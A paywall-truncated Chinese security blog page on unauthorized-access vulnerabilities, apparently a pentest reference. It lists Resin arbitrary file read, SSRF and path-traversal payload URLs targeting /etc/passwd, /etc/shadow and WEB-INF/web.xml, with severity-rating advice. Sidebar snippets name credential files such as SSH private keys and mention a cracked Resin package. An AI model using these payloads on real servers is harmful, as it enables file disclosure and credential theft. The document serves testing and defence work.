未授权访问漏洞

最新推荐文章于 2024-02-25 21:00:53 发布
VIP文章 最新推荐文章于 2024-02-25 21:00:53 发布
阅读量3.9k 收藏 1
点赞数
分类专栏: web安全 文章标签: web安全 cve 漏洞 环境
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/crystal_shrimps/article/details/107190876
版权

一、resin

1 任意文件读取

默认下Resin的/webapps目录下/resin-doc中包含有一个扩展war文件,远程攻击者可能利用此漏洞读取Web主目录下的任意文件,包括JSP源码或类文件。

payload

# viewfile任意文件读取
http://localhost/resin-doc/viewfile/?file=index.jsp

# jndi-appconfig inputFile任意文件读取/SSRF
http://localhost/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd

/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=远端服务器(Ceye)/内网IP
# %20任意文件读取, 通过此漏洞可以读取到串口设备的信息以及网站任意目录的文件遍历。
http://www.example.com:8080/[path]/[device].[extension]
http://www.example.com:8080/%20../web-inf
http://www.example.com:8080/%20
http://www.example.com:8080/[path]/%20.xtp

file参数可读任意文件,index.jsp通常是扫描器扫出,无危害,要读到敏感文件,造成敏感文件泄露的危害,定级为中危。若只能读取无敏感信息的样例文件,定级低危或不收。

敏感文件(系统文件)

/etc/passwd
/etc/shadow
shadow和passwd都是存用户密码
WEB-INF/web.xml
Java servle
最低0.47元/天 解锁文章
Noah747
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
前言 本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在授权访问 Redis 的情况下可以利用 Redis 的相关方法,可以成功在 Redis 服务器上写入公钥,进而可以使用对应私钥直接登录目标服务器。 漏洞描述 部分 Redis
resin-3.1.10
08-10
Resin3.1.10老版本Resin3.1.10老版本Resin3.1.10老版本
任意文件读取漏洞-windows敏感文件路径字典fuzz
最新发布
qq_82303224_的博客
02-25 213
一般情况下读iis配置即可,获取路径,然后再读web.config。命令行执行读: navicat配置连接信息。
zookeeper授权访问修复建议
07-14
zookeeper授权访问修复建议
Resin 3.0.8
03-19
Resin是CAUCHO公司的产品,是一个非常流行的application server,对servlet和JSP提供了良好的支持,性能也比较优良,resin自身采用JAVA语言开发
漏洞:弱口令、爆破
mathor的博客
11-01 1万+
成因 弱口令没有严格和准确的定义,通常认为容易被别人(它们有可能对你很了解)猜测或被破解工具破解的口令均为弱口令。弱口令指的是仅包含简单数字和字母的口令,例如”123”、”abc”等,因为这样的口令很容易被别人破解。通过爆破工具就可以很容易破解用户的弱口令。 分类 普通型 普通型弱口令就是常见的密码,比如,目前网络上也有人特地整理了常用的弱口令(Top 100): 123456 a123456 1...
针对Resin服务的攻击整理
热门推荐
weixin_50464560的博客
09-29 4万+
转载http://blkstone.github.io/2017/10/30/resin-attack-vectors/#:~:text=Resin%20for%20Windows%E5%AE%9E%E7%8E%B0%E4%B8%8A%E5%AD%98%E5%9C%A8%E5%A4%9A%E4%B8%AA%E6%BC%8F%E6%B4%9E%EF%BC%8C%E8%BF%9C%E7%A8%8B%E6%94%BB%E5%87%BB%E8%80%85%E5%8F%AF%E8%83%BD%E5%88%A9%E7%
安全漏洞Resin解析漏洞分析
HBohan的博客
11-05 2382
前言 前阵子看有师傅在公众号上发表了Resin解析漏洞分析,我们也知道有个常用的OA用的就是Resin,因此我认为了解它的漏洞是十分必要的。 【学习资料】 原理分析 这个漏洞和IIS解析漏洞比较像,可以通过创建一个xxx.jsp的文件夹,并在其中放置一个txt文件,文件的内容将会被当作JSP解析。 我认为要分析这个漏洞原理,首先得先了解访问jsp文件Resin是如何处理我们请求的。 首先看下*.jsp是被哪个Servlet处理的,从配置app- default.xml中可以看出,我们的请求会被com.ca
Resin任意文件读取漏洞
weixin_30363509的博客
04-26 6977
Resin是什么 虽然看不上但是还是原因下百度百科: Resin是CAUCHO公司的产品,是一个非常流行的支持servlets和jsp的引擎,速度非常快。Resin本身包含了一个支持HTTP/1.1的WEB服务器。它不仅可以显示动态内容,而且它显示静态内容的能力也非常强,速度直逼APACHESERVER。许多站点都是使用该WEB服务器构建的。 可以认为是一个WEB服务器 Resin存在任意文件读...
viewfile php,Resin viewfile远程文件读取 – 网站安全 – 自学php
weixin_34099891的博客
03-09 1561
Finger (Save water. Shower with your girlfriend.) | 2014-01-13 12:04 受影响系统: Caucho Technology Resin v3.0.18 Caucho Technology Resin v3.0.17 Caucho Technology Resin v3.0.16 Caucho Technology Res...
任意文件读取的深度利用
向阳-Y.的博客
04-12 1261
任意文件读取的深度利用 任意文件读取的利用思路 有些文件需要高权限才能读取 /etc/passwd # 用户情况 /etc/shadow # 直接 John the Ripper /etc/hosts # 主机信息 /root/.bashrc # 环境变量 /root/.bash_history # 还有root外的其他用户 /root/.viminfo # vim 信息 /root/.ssh/id_rsa # 拿私钥直接ssh /proc/xxxx/cmdline # 进程状态枚举 xxxx 可以为000
resin-4.0.27-pro 破解包
08-18
覆盖pro.jar到 resin-4.0.27-pro/lib目录下。版本号必须保证完全一致。
项目运行的服务器:Resin-4.0.58
04-19
名称:Resin,版本:4.0.58,系统:Windows,位数:64 项目运行的服务器:Resin-4.0.58
ZooKeeper 授权访问漏洞处理方法
08-31
ZooKeeper 授权访问漏洞处理方法和重设setAcl,需要设置超级管理密码后,方可修改
授权访问漏洞集合带环境及解题.pdf
01-10
授权访问漏洞集合带环境及解题
activemq授权访问漏洞环境
01-11
网络攻防
rtsp授权访问漏洞处理
01-10
RTSP(实时流传输协议)授权访问漏洞是指攻击者可以以授权的方式访问设备上的RTSP服务。这种漏洞可能导致攻击者获取敏感信息或在受影响的设备上执行恶意操作。下面是处理RTSP授权访问漏洞的一些建议方法: 1. 及时更新设备固件:设备厂商通常会发布用于修补漏洞的软件更新,及时更新设备固件是防止RTSP授权访问漏洞导致问题的有效措施。 2. 强化访问控制:在设备上设置强密码以及限制访问RTSP服务的源IP地址,可以大大降低授权访问的风险。 3. 禁用不必要的服务:设备上禁用不必要的服务,例如关闭使用的RTSP服务端口,可以减少攻击者利用漏洞的机会。 4. 网络隔离:将设备的RTSP服务从其他重要的网络资源隔离开,以防止攻击者通过RTSP漏洞进一步入侵其他系统。 5. 安全审计:监控设备上的RTSP服务访问日志,及时发现异常行为并采取相应措施。 6. 加强网络安全意识培训:对设备管理员和用户进行网络安全意识培训,提高他们对RTSP授权访问漏洞的认识,以便能够及时处理和防范此类漏洞的风险。 总结而言,处理RTSP授权访问漏洞需要采取综合性的措施,包括设备升级、强化访问控制、禁用不必要服务、网络隔离、安全审计和加强网络安全意识培训等,以最大程度地减少潜在的安全风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值